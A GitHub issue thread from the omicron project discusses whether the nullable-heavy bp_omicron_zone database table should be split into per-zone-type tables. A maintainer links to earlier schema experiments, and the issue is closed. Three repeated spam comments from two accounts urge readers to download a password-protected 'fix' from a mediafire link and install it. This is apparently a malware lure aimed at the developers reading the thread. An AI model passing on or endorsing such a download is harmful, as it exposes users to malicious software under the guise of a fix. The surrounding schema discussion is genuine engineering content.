### ISSUE TITLE
Reconsider CRDB zone table schemas?

### ISSUE THREAD

**Issue by andrewjstone** [oxidecomputer/omicron#6446]
This issue really is a question. I'm not fully sold on doing this, but wanted to write it down while thinking about it and solicit some feedback.

I've been spending a lot of time with reconfigurator lately, and in particular blueprint zones and inventory zones. When converting between the DB types and the canonical omicron types used throughout the control plane, there is a lot of error checking, matching, and type conversion that goes on. 

In particular, each [BlueprintZoneType](https://github.com/oxidecomputer/omicron/blob/main/nexus/types/src/deployment/zone_type.rs#L24) enum gets converted into a [BpOmicronZone](https://github.com/oxidecomputer/omicron/blob/6e0bf12278ccaca58d74edb57c11a5dadc1f2f3d/nexus/db-model/src/deployment.rs#L225-L246) db-model struct and vice versa. The `BpOmicronZone` struct has options for the variety of different fields of each `BlueprintZoneType` variant. This means that those fields when mapped into the [bp_omicron_zone](https://github.com/oxidecomputer/omicron/blob/6e0bf12278ccaca58d74edb57c11a5dadc1f2f3d/schema/crdb/dbinit.sql#L3461) database table map to nullable rows. This leads to the vast majority of rows being nullable and therefore makes conversion between types subject to human error, such as forgetting to actually fill in a field properly. You can see [all the options and matching](https://github.com/oxidecomputer/omicron/blob/main/nexus/db-model/src/omicron_zone_config.rs#L72-L209) in the piece of code I'm currently converting do disentangle the inventory and blueprint types. Unfortunately this disambiguation is also going to lead to doing these types of conversions twice, for the inventory zones as well as the blueprint zones.

This all was done deliberately, and there was some discussion about it at the time, although I don't really recall the specifics as I wasn't heavily involved. What I recall is that the primary motivator was to prevent having to have a specific db table, and therefore db model type, for each omicron zone type. There is also the benefit that the current structure puts all the [common fields](https://github.com/oxidecomputer/omicron/blob/6e0bf12278ccaca58d74edb57c11a5dadc1f2f3d/schema/crdb/dbinit.sql#L3462-L3481) of a zone in the same table, and that we can paginate through all zones without a foreign key lookup.

On the other hand, this makes the conversion code more unwieldy (not a huge problem to be clear - just something we have to be careful with) and it also contradicts the normalization of types that most of the rest of the DB uses. The database should be able to easily handle having separate tables for each zone type, and then one for the common type, and then joining the tables as needed. While it seems like more boilerplate at first, it's really just different boilerplate than what we have now. With a table for each omicron zone we'd have to create a db model type for each zone and do some joins. But we would not have to add conversion code for each new zone type. We'd just fill in the variant appropriately, which would match 1:1 with what's in the DB for that zone, and fill in the common fields with the zone table minus the zone specific optional rows that we'd remove.

I'm not actually sure how hard of an undertaking this would be. It doesn't seem that hard in terms of code etc... even if it is a bit tedious. The most challenging part I think would be writing the migrations.

I'm leaning towards this being a net win in the longer run from a SQL POV, mainly because having all those nullable columns in one table scares me. But I understand I may be missing all the justifications for the existing code and that it may just not be worth it to do this change now, or ever.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jgallagher** [comment]
@davepacheco and I chatted about this and he did a bunch of experimentation before landing the `inv_omicron_zone` table (which `bp_omicron_zone` is modeled after). I don't want to just dump a bunch of chat messages here, but it's also kinda tricky to summarize. Some of the experiments he did:

* [A table per zone type](https://github.com/oxidecomputer/omicron/blob/84e724feac8ee2d39342b85689cccde1c0935a16/schema/crdb/dbinit.sql#L2944-L3147)
* [Common properties in a generic table; zone-type-specific tables for some zones](https://github.com/oxidecomputer/omicron/blob/d86d32bbf18c049dccf04e7577b687e64a69a27e/schema/crdb/dbinit.sql#L2949-L3103)
* One generic table (no link because this is where we landed)

I assume it's probably fine to paste one snippet from our chats verbatim:

> I remain unsatisfied with all the options, which all seem like a mess and a lot of work. 

which I think remains true today :sweat_smile:.

**Comment by andrewjstone** [comment]
Thanks for the links @jgallagher. That's really helpful and satisfies my curiosity.

I was proposing something most similar to the second bullet there, but I probably wouldn't include any types (like NICs) that are nullable in the common table.

In any event, this was discussed and modeled, and I don't feel it's helpful to re-litigate right now. We definitely have more important things to do, so I'm going to close this.
